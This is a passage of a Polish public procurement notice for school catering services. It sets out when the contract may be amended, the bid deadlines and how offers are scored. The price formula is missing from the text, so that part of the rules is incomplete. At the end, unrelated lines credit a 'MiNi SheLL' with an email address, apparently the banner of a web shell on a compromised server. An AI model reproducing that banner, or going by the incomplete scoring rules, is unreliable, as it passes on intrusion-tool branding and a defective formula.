warunki ich wprowadzenia: </h3> 1. Strony określają następujące warunki, w jakich przewiduje możliwość dokonania zmian<br/>postanowień zawartej umowy:<br/>1) zmiana regulacji prawnych obowiązujących w dniu podpisania umowy (m.in. zmian stawki<br/>VAT), przy czym wartość brutto umowy pozostaje bez zmian,<br/>2) termin realizacji zamówienia - jeżeli zmiana terminu realizacji zamówienia będzie korzystna<br/>dla Zamawiającego lub konieczność zmiany terminu wynika ze zdarzeń niezależnych od stron<br/>umowy, których nie dało się przewidzieć przy zawieraniu umowy, na przykład stan epidemii i<br/>zamknięcie szkoły, przedszkola i żłobka.<br/>3) zmiany zaistniałe z przyczyn organizacyjnych np.: zmiana danych teleadresowych, zmiana nr<br/>konta i innych danych podmiotowych<br/>4) zmiany liczby dzieci lub młodzieży, dla których świadczona jest usługa żywieniowa, w<br/>przypadkach:<br/>a) wystąpienia warunków atmosferycznych uniemożliwiających realizację przedmiotu<br/>zamówienia np. (zawieszenie zajęć z powodu warunków atmosferycznych bądź innych<br/>czynników, których Zamawiający nie mógł przewidzieć),<br/>b) działania siły wyższej,<br/>c) stan epidemii i zamknięcie szkoły, przedszkola i żłobka.<br/>d) przyjęcia nowych uczniów,<br/>e) skreślenia dziecka z listy uczniów,<br/>f) zmiany w szkolnym planie nauczania<br/>2. Warunkiem zmiany postanowień umowy jest zgoda obu stron wyrażona na piśmie pod<br/>warunkiem nieważności w formie aneksu do umowy.<br/>3. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w<br/>interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający<br/>odstąpi od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W tym<br/>przypadku wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-23 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Miniportal Identyfikator postępowania 09ccbdb4-fe60-4409-a3b1-ab397961a82b</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-23 08:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-22</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający będzie oceniał każdą z ofert na podstawie następujących kryteriów:<br/>Lp. Nazwa kryterium Znaczenie kryterium (w %)<br/>1. Cena (C) 60<br/>2. Termin Płatności 40<br/>2. Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów<br/>oceny ofert, przyjmując zasadę, że 1% = 1 punkt.<br/>3. Punkty za kryterium „Cena (C)” (waga 60%) zostaną obliczone według wzoru:<br/>gdzie,<br/>C – ilość punktów za kryterium cena,<br/>Cn – najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>Cb – cena oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po<br/>matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy<br/>wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>4. Punkty za kryterium „Termin płatności (T)” zostaną przyznane w skali:<br/>Termin płatności<br/>Liczba punktów<br/>7 dni - 0 pkt<br/>14 dni - 20 pkt<br/>30 dni - 40 pkt<br/>5. Ilość punktów przyznanych ofercie, zostanie obliczona na podstawie wzoru:<br/>Przyznana ilość punktów = C + T<br/>2021-08-13 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Dostawy<br/>6. Za najkorzystniejszą zostanie uznana oferta z największą liczbą punktów, tj. przedstawiająca<br/>najkorzystniejszy bilans kryteriów oceny ofert, o których mowa w ust. 1.

Creat By MiNi SheLL
Email: jattceo@gmail.com